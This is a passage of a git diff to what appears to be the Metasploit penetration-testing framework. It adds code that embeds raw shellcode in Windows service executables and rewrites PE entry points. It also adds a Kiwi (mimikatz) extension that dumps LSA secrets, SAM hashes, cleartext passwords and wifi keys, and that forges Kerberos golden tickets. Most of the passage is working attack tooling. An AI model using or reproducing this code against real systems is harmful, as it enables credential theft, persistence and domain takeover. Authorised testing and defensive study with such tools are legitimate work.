+          #shift original entry point to prevent tables overwritting
+          addressOfEntryPoint = importsTable - (code.length + 4)
+
+          entry_point_offset = pe._dos_header.v['e_lfanew'] + entryPoint_offset
+          exe[entry_point_offset,4] = [addressOfEntryPoint].pack('L')
+        end
+        # put this section writable
+        characteristics |= 0x8000_0000
         newcharacteristics = [characteristics].pack('L')
-        exe[sec[0],newcharacteristics.length]=newcharacteristics
+        exe[sec[0],newcharacteristics.length] = newcharacteristics
       end
     end
 
-    #put the shellcode at the entry point, overwriting template
-    exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code
-
+    # put the shellcode at the entry point, overwriting template
+    entryPoint_file_offset = pe.rva_to_file_offset(addressOfEntryPoint)
+    exe[entryPoint_file_offset,code.length] = code
     return exe
   end
 
@@ -383,6 +412,33 @@ require 'msf/core/exe/segment_injector'
     return pe
   end
 
+
+  # Splits a string into a number of assembly push operations
+  #
+  # @param string [String] string to be used
+  #
+  # @return [String] null terminated string as assembly push ops
+  def self.string_to_pushes(string)
+    str = string.dup
+    # Align string to 4 bytes
+    rem = (str.length) % 4
+    if (rem > 0)
+      str << "\x00" * (4 - rem)
+      pushes = ''
+    else
+      pushes = "h\x00\x00\x00\x00"
+    end
+    # string is now 4 bytes aligned with null byte
+
+    # push string to stack, starting at the back
+    while (str.length > 0)
+      four = 'h'+str.slice!(-4,4)
+      pushes << four
+    end
+
+    pushes
+  end
+
   def self.exe_sub_method(code,opts ={})
 
     pe = ''
@@ -462,11 +518,82 @@ require 'msf/core/exe/segment_injector'
     exe_sub_method(code,opts)
   end
 
+  # Embeds shellcode within a Windows PE file implementing the Windows
+  # service control methods.
+  #
+  # @param framework [Object]
+  # @param code [String] shellcode to be embedded
+  # @option opts [Boolean] :sub_method use substitution technique with a
+  #   service template PE
+  # @option opts [String] :servicename name of the service, not used in
+  #   substituion technique
+  #
+  # @return [String] Windows Service PE file
   def self.to_win32pe_service(framework, code, opts={})
-    # Allow the user to specify their own service EXE template
-    set_template_default(opts, "template_x86_windows_svc.exe")
-    opts[:exe_type] = :service_exe
-    exe_sub_method(code,opts)
+    if opts[:sub_method]
+      # Allow the user to specify their own service EXE template
+      set_template_default(opts, "template_x86_windows_svc.exe")
+      opts[:exe_type] = :service_exe
+      return exe_sub_method(code,opts)
+    else
+      name = opts[:servicename]
+      name ||= Rex::Text.rand_text_alpha(8)
+      pushed_service_name = string_to_pushes(name)
+
+      precode_size = 0xc6
+      svcmain_code_offset = precode_size + pushed_service_name.length
+
+      precode_size = 0xcc
+      hash_code_offset = precode_size + pushed_service_name.length
+
+      precode_size = 0xbf
+      svcctrlhandler_code_offset = precode_size + pushed_service_name.length
+
+      code_service_stopped =
+        "\xE8\x00\x00\x00\x00\x5F\xEB\x07\x58\x58\x58\x58\x31\xC0\xC3" +
+         pushed_service_name+"\x89\xE1\x8D\x47\x03\x6A\x00" +
+        "\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5\x6A\x00\x6A\x00\x6A\x00\x6A" +
+        "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
+        "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
+
+      precode_size = 0x42
+      shellcode_code_offset = code_service_stopped.length + precode_size
+
+      # code_service could be encoded in the future
+      code_service =
+        "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+        "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+        "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+        "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+        "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+        "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+        "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+        "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+        "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+        "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
+        "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" +
+        "\x8D\x85"+[svcmain_code_offset].pack('<I')+"\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
+        "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
+        "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED" +
+         [hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
+        "\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
+        "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
+        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
+        "\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
+        "\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
+        "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
+        "\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" +
+        "\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack('<I')+"\x57\x51\x68\xAE\x87" +
+        "\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x81\xC2" +
+         [shellcode_code_offset].pack('<I')+"\x54\x68"+[code.length].pack('<I') +
+        "\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
+        "\xD5\x31\xC0\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A" +
+        "\x79\xFF\xD5\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04" +
+        "\x51\x68\xC6\x96\x87\x52\xFF\xD5" +
+         code_service_stopped
+
+      return to_winpe_only(framework, code_service + code, opts)
+    end
   end
 
   def self.to_win64pe_service(framework, code, opts={})
diff --git a/lib/msfenv.rb b/lib/msfenv.rb
index a6e00a1df6..e8dcf684f4 100644
--- a/lib/msfenv.rb
+++ b/lib/msfenv.rb
@@ -2,7 +2,27 @@
 # Use bundler to load dependencies
 #
 
-ENV['BUNDLE_GEMFILE'] ||= ::File.expand_path(::File.join(::File.dirname(__FILE__), "..", "Gemfile"))
+GEMFILE_EXTENSIONS = [
+  '.local',
+  ''
+]
+
+unless ENV['BUNDLE_GEMFILE']
+  require 'pathname'
+
+  msfenv_real_pathname = Pathname.new(__FILE__).realpath
+  root = msfenv_real_pathname.parent.parent
+
+  GEMFILE_EXTENSIONS.each do |extension|
+    extension_pathname = root.join("Gemfile#{extension}")
+
+    if extension_pathname.readable?
+      ENV['BUNDLE_GEMFILE'] ||= extension_pathname.to_path
+      break
+    end
+  end
+end
+
 begin
   require 'bundler/setup'
 rescue ::LoadError
diff --git a/lib/rex/exploitation/cmdstager/base.rb b/lib/rex/exploitation/cmdstager/base.rb
index 713be53a3f..0e966113ad 100644
--- a/lib/rex/exploitation/cmdstager/base.rb
+++ b/lib/rex/exploitation/cmdstager/base.rb
@@ -127,11 +127,12 @@ class CmdStagerBase
   def compress_commands(cmds, opts)
     new_cmds = []
     line = ''
-    concat = cmd_concat_operator
+
+    concat = opts[:concat_operator] || cmd_concat_operator
 
     # We cannot compress commands if there is no way to combine commands on
     # a single line.
-    return cmds if not concat
+    return cmds unless concat
 
     cmds.each { |cmd|
 
@@ -171,6 +172,19 @@ class CmdStagerBase
     nil
   end
 
+  # Should be overriden if the cmd stager needs to setup anything
+  # before it's executed
+  def setup(mod = nil)
+
+  end
+
+  #
+  # Should be overriden if the cmd stager needs to do any clenaup
+  #
+  def teardown(mod = nil)
+
+  end
+
 end
 end
 end
diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb
index 60240d638e..6fbb84829c 100644
--- a/lib/rex/exploitation/cmdstager/tftp.rb
+++ b/lib/rex/exploitation/cmdstager/tftp.rb
@@ -27,10 +27,19 @@ class CmdStagerTFTP < CmdStagerBase
 
   def initialize(exe)
     super
-
     @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
   end
 
+  def setup(mod)
+    tftp = Rex::Proto::TFTP::Server.new
+    tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
+    tftp.start
+    mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
+  end
+
+  def teardown(mod = nil)
+    tftp.stop
+  end
 
   #
   # We override compress commands just to stick in a few extra commands
@@ -54,8 +63,9 @@ class CmdStagerTFTP < CmdStagerBase
   # NOTE: We don't use a concatenation operator here since we only have a couple commands.
   # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
   # the start command being issued separately so that it can ignore it :)
-
+  attr_reader :exe
   attr_reader :payload_exe
+  attr_accessor :tftp
 end
 end
 end
diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb
index 40ddcdded7..ef80bb5ec5 100644
--- a/lib/rex/mime/part.rb
+++ b/lib/rex/mime/part.rb
@@ -36,8 +36,8 @@ class Part
 
   # Returns the Content-Transfer-Encoding of the part.
   #
-  # @returns [nil] if the part hasn't Content-Transfer-Encoding.
-  # @returns [String] The Content-Transfer-Encoding or the part.
+  # @return [nil] if the part hasn't Content-Transfer-Encoding.
+  # @return [String] The Content-Transfer-Encoding or the part.
   def transfer_encoding
     h = header.find('Content-Transfer-Encoding')
     return nil if h.nil?
diff --git a/lib/rex/post/meterpreter.rb b/lib/rex/post/meterpreter.rb
index fc62e558dc..8986c6f0b4 100644
--- a/lib/rex/post/meterpreter.rb
+++ b/lib/rex/post/meterpreter.rb
@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
 
+require 'meterpreter_bins'
 require 'rex/post/meterpreter/client'
 require 'rex/post/meterpreter/ui/console'
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index a48b513825..a9f13dca42 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -149,7 +149,8 @@ class ClientCore < Extension
     end
     # Get us to the installation root and then into data/meterpreter, where
     # the file is expected to be
-    path = ::File.join(Msf::Config.data_directory, 'meterpreter', 'ext_server_' + mod.downcase + ".#{client.binary_suffix}")
+    modname = "ext_server_#{mod.downcase}"
+    path = MeterpreterBinaries.path(modname, client.binary_suffix)
 
     if (opts['ExtensionPath'])
       path = opts['ExtensionPath']
@@ -221,7 +222,7 @@ class ClientCore < Extension
 
     # Create the migrate stager
     migrate_stager = c.new()
-    migrate_stager.datastore['DLL'] = ::File.join( Msf::Config.data_directory, "meterpreter", "metsrv.#{binary_suffix}" )
+    migrate_stager.datastore['DLL'] = MeterpreterBinaries.path('metsrv',binary_suffix)
 
     blob = migrate_stager.stage_payload
 
@@ -266,7 +267,7 @@ class ClientCore < Extension
     end
 
     # Send the migration request (bump up the timeout to 60 seconds)
-    response = client.send_request( request, 60 )
+    client.send_request( request, 60 )
 
     if client.passive_service
       # Sleep for 5 seconds to allow the full handoff, this prevents
@@ -282,12 +283,25 @@ class ClientCore < Extension
         # Now communicating with the new process
         ###
 
-        # Renegotiate SSL over this socket
-        client.swap_sock_ssl_to_plain()
-        client.swap_sock_plain_to_ssl()
+        # If renegotiation takes longer than a minute, it's a pretty
+        # good bet that migration failed and the remote side is hung.
+        # Since we have the comm_mutex here, we *must* release it to
+        # keep from hanging the packet dispatcher thread, which results
+        # in blocking the entire process. See Redmine #8794
+        begin
+          Timeout.timeout(60) do
+            # Renegotiate SSL over this socket
+            client.swap_sock_ssl_to_plain()
+            client.swap_sock_plain_to_ssl()
+          end
+        rescue TimeoutError
+          client.alive = false
+          return false
+        end
 
         # Restart the socket monitor
         client.monitor_socket
+
       end
     end
 
diff --git a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb
index d7a7db2409..ad7731162d 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb
@@ -32,7 +32,7 @@ class Adsi
   # @param fields [Array] Array of string fields to return for
   #   each result found
   #
-  # @returns [Hash] Array of field names with associated results.
+  # @return [Hash] Array of field names with associated results.
   #
   def domain_query(domain_name, filter, max_results, page_size, fields)
     request = Packet.create_request('extapi_adsi_domain_query')
diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb
index c6351318bd..fde12f624e 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb
@@ -26,7 +26,7 @@ class Wmi
   # @param root [String] Specify root to target, otherwise defaults
   #   to 'root\cimv2'
   #
-  # @returns [Hash] Array of field names with associated values.
+  # @return [Hash] Array of field names with associated values.
   #
   def query(query, root = nil)
     request = Packet.create_request('extapi_wmi_query')
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
new file mode 100644
index 0000000000..3a7eeb7d86
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
@@ -0,0 +1,361 @@
+# -*- coding: binary -*-
+
+require 'rex/post/meterpreter/extensions/kiwi/tlv'
+require 'rexml/document'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Kiwi
+
+###
+#
+# Kiwi extension - grabs credentials from windows memory.
+#
+# Benjamin DELPY `gentilkiwi`
+# http://blog.gentilkiwi.com/mimikatz
+#
+# extension converted by OJ Reeves (TheColonial)
+###
+
+class Kiwi < Extension
+
+  #
+  # These are constants that identify the type of credential to dump
+  # from the target machine.
+  #
+  PWD_ID_SEK_ALLPASS   = 0
+  PWD_ID_SEK_WDIGEST   = 1
+  PWD_ID_SEK_MSV       = 2
+  PWD_ID_SEK_KERBEROS  = 3
+  PWD_ID_SEK_TSPKG     = 4
+  PWD_ID_SEK_LIVESSP   = 5
+  PWD_ID_SEK_SSP       = 6
+  PWD_ID_SEK_DPAPI     = 7
+
+  #
+  # List of names which represent the flags that are part of the
+  # dumped kerberos tickets. The order of these is important. Each
+  # of them was pulled from the Mimikatz 2.0 source base.
+  #
+  KERBEROS_FLAGS = [
+    "NAME CANONICALIZE",
+    "<unknown>",
+    "OK AS DELEGATE",
+    "<unknown>",
+    "HW AUTHENT",
+    "PRE AUTHENT",
+    "INITIAL",
+    "RENEWABLE",
+    "INVALID",
+    "POSTDATED",
+    "MAY POSTDATE",
+    "PROXY",
+    "PROXIABLE",
+    "FORWARDED",
+    "FORWARDABLE",
+    "RESERVED"
+  ].map(&:freeze).freeze
+
+  #
+  # Typical extension initialization routine.
+  #
+  # @param client (see Extension#initialize)
+  def initialize(client)
+    super(client, 'kiwi')
+
+    client.register_extension_aliases(
+      [
+        {
+          'name' => 'kiwi',
+          'ext'  => self
+        },
+      ])
+  end
+
+  #
+  # Dump the LSA secrets from the target machine.
+  #
+  # @return [Hash<Symbol,Object>]
+  def lsa_dump
+    request = Packet.create_request('kiwi_lsa_dump_secrets')
+
+    response = client.send_request(request)
+
+    result = {
+      :major    => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MAJ),
+      :minor    => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MIN),
+      :compname => response.get_tlv_value(TLV_TYPE_KIWI_LSA_COMPNAME),
+      :syskey   => response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY),
+      :nt5key   => response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY),
+      :nt6keys  => [],
+      :secrets  => [],
+      :samkeys  => []
+    }
+
+    response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k|
+      result[:nt6keys] << {
+        :id    => k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYID),
+        :value => k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYVALUE)
+      }
+    end
+
+    response.each(TLV_TYPE_KIWI_LSA_SECRET) do |s|
+      result[:secrets] << {
+        :name        => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NAME),
+        :service     => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_SERV),
+        :ntlm        => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NTLM),
+        :current     => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR),
+        :current_raw => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW),
+        :old         => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD),
+        :old_raw     => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)
+      }
+    end
+
+    response.each(TLV_TYPE_KIWI_LSA_SAM) do |s|
+      result[:samkeys] << {
+        :rid       => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_RID),
+        :user      => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_USER),
+        :ntlm_hash => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_NTLMHASH),
+        :lm_hash   => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_LMHASH)
+      }
+    end
+
+    result
+  end
+
+  #
+  # Convert a flag set to a list of string representations for the bit flags
+  # that are set.
+  #
+  # @param flags [Fixnum] Integer bitmask of Kerberos token flags.
+  #
+  # @return [Array<String>] Names of all set flags in +flags+. See
+  #   {KERBEROS_FLAGS}
+  def to_kerberos_flag_list(flags)
+    flags = flags >> 16
+    results = []
+
+    KERBEROS_FLAGS.each_with_index do |item, idx|
+      if (flags & (1 << idx)) != 0
+        results  << item
+      end
+    end
+
+    results
+  end
+
+  #
+  # List available kerberos tickets.
+  #
+  # @param export [Bool] Set to +true+ to export the content of each ticket
+  #
+  # @return [Array<Hash>]
+  #
+  def kerberos_ticket_list(export)
+    export ||= false
+    request = Packet.create_request('kiwi_kerberos_ticket_list')
+    request.add_tlv(TLV_TYPE_KIWI_KERB_EXPORT, export)
+    response = client.send_request(request)
+
+    results = []
+
+    response.each(TLV_TYPE_KIWI_KERB_TKT) do |t|
+      results << {
+        :enc_type     => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_ENCTYPE),
+        :start        => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_START),
+        :end          => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_END),
+        :max_renew    => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_MAXRENEW),
+        :server       => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_SERVERNAME),
+        :server_realm => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_SERVERREALM),
+        :client       => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME),
+        :client_realm => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM),
+        :flags        => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_FLAGS),
+        :raw          => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW)
+      }
+    end
+
+    results
+  end
+
+  #
+  # Use the given ticket in the current session.
+  #
+  # @param ticket [String] Content of the Kerberos ticket to use.
+  #
+  # @return [void]
+  #
+  def kerberos_ticket_use(ticket)
+    request = Packet.create_request('kiwi_kerberos_ticket_use')
+    request.add_tlv(TLV_TYPE_KIWI_KERB_TKT_RAW, ticket, false, true)
+    client.send_request(request)
+    return true
+  end
+
+  #
+  # Purge any Kerberos tickets that have been added to the current session.
+  #
+  # @return [void]
+  #
+  def kerberos_ticket_purge
+    request = Packet.create_request('kiwi_kerberos_ticket_purge')
+    client.send_request(request)
+    return true
+  end
+
+  #
+  # Create a new golden kerberos ticket on the target machine and return it.
+  #
+  # @param user [String] Name of the user to create the ticket for.
+  # @param domain [String] Domain name.
+  # @param sid [String] SID of the domain.
+  # @param tgt [String] The kerberos ticket granting token.
+  # @param id [Fixnum] ID of the user to grant the token for.
+  # @param group_ids [Array<Fixnum>] IDs of the groups to assign to the user
+  #
+  # @return [String]
+  #
+  def golden_ticket_create(user, domain, sid, tgt, id = 0, group_ids = [])
+    request = Packet.create_request('kiwi_kerberos_golden_ticket_create')
+    request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user)
+    request.add_tlv(TLV_TYPE_KIWI_GOLD_DOMAIN, domain)
+    request.add_tlv(TLV_TYPE_KIWI_GOLD_SID, sid)
+    request.add_tlv(TLV_TYPE_KIWI_GOLD_TGT, tgt)
+    request.add_tlv(TLV_TYPE_KIWI_GOLD_USERID, id)
+
+    group_ids.each do |g|
+      request.add_tlv(TLV_TYPE_KIWI_GOLD_GROUPID, g)
+    end
+
+    response = client.send_request(request)
+    return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW)
+  end
+
+  #
+  # List all the wifi interfaces and the profiles associated
+  # with them. Also show the raw text passwords for each.
+  #
+  # @return [Array<Hash>]
+  def wifi_list
+    request = Packet.create_request('kiwi_wifi_profile_list')
+
+    response = client.send_request(request)
+
+    results = []
+
+    response.each(TLV_TYPE_KIWI_WIFI_INT) do |i|
+      interface = {
+        :guid     => Rex::Text::to_guid(i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_GUID)),
+        :desc     => i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_DESC),
+        :state    => i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_STATE),
+        :profiles => []
+      }
+
+      i.each(TLV_TYPE_KIWI_WIFI_PROFILE) do |p|
+
+        xml = p.get_tlv_value(TLV_TYPE_KIWI_WIFI_PROFILE_XML)
+        doc = REXML::Document.new(xml)
+        profile = doc.elements['WLANProfile']
+
+        interface[:profiles] << {
+          :name        => p.get_tlv_value(TLV_TYPE_KIWI_WIFI_PROFILE_NAME),
+          :auth        => profile.elements['MSM/security/authEncryption/authentication'].text,
+          :key_type    => profile.elements['MSM/security/sharedKey/keyType'].text,
+          :shared_key  => profile.elements['MSM/security/sharedKey/keyMaterial'].text
+        }
+      end
+
+      results << interface
+    end
+
+    return results
+  end
+
+  #
+  # Scrape passwords from the target machine.
+  #
+  # @param pwd_id [Fixnum] ID of the type credential to scrape.
+  #
+  # @return [Array<Hash>]
+  def scrape_passwords(pwd_id)
+    request = Packet.create_request('kiwi_scrape_passwords')
+    request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id)
+    response = client.send_request(request)
+
+    results = []
+    response.each(TLV_TYPE_KIWI_PWD_RESULT) do |r|
+      results << {
+        :username => r.get_tlv_value(TLV_TYPE_KIWI_PWD_USERNAME),
+        :domain   => r.get_tlv_value(TLV_TYPE_KIWI_PWD_DOMAIN),
+        :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD),
+        :auth_hi  => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI),
+        :auth_lo  => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO),
+        :lm       => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH),
+        :ntlm     => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH)
+      }
+    end
+
+    return results
+  end
+
+  #
+  # Scrape all passwords from the target machine.
+  #
+  # @return (see #scrape_passwords)
+  def all_pass
+    scrape_passwords(PWD_ID_SEK_ALLPASS)
+  end
+
+  #
+  # Scrape wdigest credentials from the target machine.
+  #
+  # @return (see #scrape_passwords)
+  def wdigest
+    scrape_passwords(PWD_ID_SEK_WDIGEST)
+  end
+
+  #
+  # Scrape msv credentials from the target machine.
+  #
+  # @return (see #scrape_passwords)
+  def msv
+    scrape_passwords(PWD_ID_SEK_MSV)
+  end
+
+  #
+  # Scrape LiveSSP credentials from the target machine.
+  #
+  # @return (see #scrape_passwords)
+  def livessp
+    scrape_passwords(PWD_ID_SEK_LIVESSP)
+  end
+
+  #
+  # Scrape SSP credentials from the target machine.
+  #
+  # @return (see #scrape_passwords)
+  def ssp
+    scrape_passwords(PWD_ID_SEK_SSP)
+  end
+
+  #
+  # Scrape TSPKG credentials from the target machine.
+  #
+  # @return (see #scrape_passwords)
+  def tspkg
+    scrape_passwords(PWD_ID_SEK_TSPKG)
+  end
+
+  #
+  # Scrape Kerberos credentials from the target machine.
+  #
+  # @return (see #scrape_passwords)
+  def kerberos
+    scrape_passwords(PWD_ID_SEK_KERBEROS)
+  end
+
+end
+
+end; end; end; end; end
+
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb
new file mode 100644
index 0000000000..ff09f8a0b8
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb
@@ -0,0 +1,76 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Kiwi
+
+TLV_TYPE_KIWI_PWD_ID               = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 1)
+TLV_TYPE_KIWI_PWD_RESULT           = TLV_META_TYPE_GROUP  | (TLV_EXTENSIONS + 2)
+TLV_TYPE_KIWI_PWD_USERNAME         = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
+TLV_TYPE_KIWI_PWD_DOMAIN           = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
+TLV_TYPE_KIWI_PWD_PASSWORD         = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
+TLV_TYPE_KIWI_PWD_AUTH_HI          = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 6)
+TLV_TYPE_KIWI_PWD_AUTH_LO          = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 7)
+TLV_TYPE_KIWI_PWD_LMHASH           = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8)
+TLV_TYPE_KIWI_PWD_NTLMHASH         = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9)
+
+TLV_TYPE_KIWI_GOLD_USER            = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10)
+TLV_TYPE_KIWI_GOLD_DOMAIN          = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11)
+TLV_TYPE_KIWI_GOLD_SID             = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12)
+TLV_TYPE_KIWI_GOLD_TGT             = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13)
+TLV_TYPE_KIWI_GOLD_USERID          = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 14)
+TLV_TYPE_KIWI_GOLD_GROUPID         = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 15)
+
+TLV_TYPE_KIWI_LSA_VER_MAJ          = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 20)
+TLV_TYPE_KIWI_LSA_VER_MIN          = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 21)
+TLV_TYPE_KIWI_LSA_COMPNAME         = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 22)
+TLV_TYPE_KIWI_LSA_SYSKEY           = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 23)
+TLV_TYPE_KIWI_LSA_KEYCOUNT         = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 24)
+TLV_TYPE_KIWI_LSA_KEYID            = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 25)
+TLV_TYPE_KIWI_LSA_KEYIDX           = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 26)
+TLV_TYPE_KIWI_LSA_KEYVALUE         = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 27)
+TLV_TYPE_KIWI_LSA_NT6KEY           = TLV_META_TYPE_GROUP  | (TLV_EXTENSIONS + 28)
+TLV_TYPE_KIWI_LSA_NT5KEY           = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 29)
+
+TLV_TYPE_KIWI_LSA_SECRET           = TLV_META_TYPE_GROUP  | (TLV_EXTENSIONS + 35)
+TLV_TYPE_KIWI_LSA_SECRET_NAME      = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 36)
+TLV_TYPE_KIWI_LSA_SECRET_SERV      = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 37)
+TLV_TYPE_KIWI_LSA_SECRET_NTLM      = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 38)
+TLV_TYPE_KIWI_LSA_SECRET_CURR      = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 39)
+TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW  = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 40)
+TLV_TYPE_KIWI_LSA_SECRET_OLD       = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 41)
